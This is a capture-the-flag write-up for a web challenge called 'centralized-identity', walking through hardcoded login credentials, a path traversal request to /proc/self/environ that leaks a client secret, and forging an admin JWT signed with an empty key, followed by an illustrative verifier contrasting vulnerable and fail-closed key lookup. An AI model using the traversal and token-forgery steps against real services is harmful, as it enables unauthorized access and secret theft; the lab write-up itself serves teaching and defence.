[/MNT/AIN LIB] [WEB] centralized-identity

centralized-identity
SRC: https://library.m0unt41n.ch/challenges/centralized-identity

This challenge consists of multiple steps; our main goal is to obtain the flag via the backend service API.

1. Within the IDP's entrypoint.sh we can find credentials to log in to the frontend.

email: "[email protected]"
password: "password"

2. The /page endpoint in the frontend service has a path traversal vulnerability, which we can use to dump the client secret for our token exchange.

Python:
# Frontend's /page handler (challenge code): the user-supplied `page`
# parameter is joined into the file path without any normalisation, so
# "../" sequences walk out of templates/ into the rest of the filesystem.
@app.route("/page")
@auth.oidc_auth("default")
def page():
    page = request.args.get("page")
    if page is None:
        return "Not found", 404
    try:
        with open(f"templates/{page}", "r") as f:
            return f.read()
    except Exception as e:
        print(e)
        return "Not found", 404

Requesting /page?page=../../../../proc/self/environ gives us CLIENT_SECRET=ZMyjEAypRBXCTQMIiqTbT8M8GXiGrSd

3. The next vulnerability lies in how JWTs are handled. The key lookup falls back to an empty string, which allows us to define the key used for signing ourselves, or just pass no key at all.

Python:
# Key lookup helper (challenge code): a missing or unset entry is silently
# turned into "", so verification proceeds with an empty HMAC key.
def get_value(dict, key):
    return dict.get(key) or ""

So we can forge an admin JWT signed with an empty key.

Python:
import jwt
header = {
    "alg": "HS256",
    "kid": "frontend",
}
payload = {
    "name": "admin",
    "aud": "frontend",
}
subject_token = jwt.encode(payload, key="", headers=header)
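As an added illustration (not code from the challenge), here is a stdlib-only HS256 verifier that shows why the `or ""` fallback is the bug: a key lookup that turns an unconfigured `kid` into an empty string accepts a token signed with "", while a lookup that fails closed rejects it. The key store, secrets and sample tokens are constructed for the example.

```python
import base64, hashlib, hmac, json

# Constructed key store (assumption for this example, not the challenge's config):
# the frontend's secret is unset, as happens when an env var is missing.
KEYS = {"backend": "example-backend-secret", "frontend": None}

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def hs256_token(header: dict, payload: dict, key: str) -> str:
    # Minimal stdlib HS256 signer, used only to build the sample tokens below.
    signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(payload).encode())
    sig = hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def lookup_key_vulnerable(kid: str) -> str:
    # Same shape as the challenge's get_value(): a missing or unset kid becomes "".
    return KEYS.get(kid) or ""

def lookup_key_fixed(kid: str) -> str:
    # Hardened: an unknown or unconfigured kid is a hard failure, never an empty key.
    key = KEYS.get(kid)
    if not key:
        raise ValueError(f"no signing key configured for kid {kid!r}")
    return key

def verify_hs256(token: str, lookup) -> dict:
    # Pins the algorithm (rejects "none") and checks the MAC over the segments as received.
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    key = lookup(str(header.get("kid", "")))
    mac = hmac.new(key.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(mac, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))

def accepts(token: str, lookup) -> bool:
    try:
        verify_hs256(token, lookup)
        return True
    except ValueError:
        return False

# Constructed sample tokens: a legitimate backend token, and one signed with "" for kid "frontend".
GOOD = hs256_token({"alg": "HS256", "kid": "backend"}, {"name": "alice"}, KEYS["backend"])
FORGED = hs256_token({"alg": "HS256", "kid": "frontend"}, {"name": "admin"}, "")
```

Run it and compare `accepts(FORGED, lookup_key_vulnerable)` with `accepts(FORGED, lookup_key_fixed)`: only the fail-closed lookup refuses the empty-key token, while both accept the legitimate one.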

4. Now we use the forged JWT and the client secret to request an access token, then call the flag endpoint.

Puff piff paff multi step hack of doom.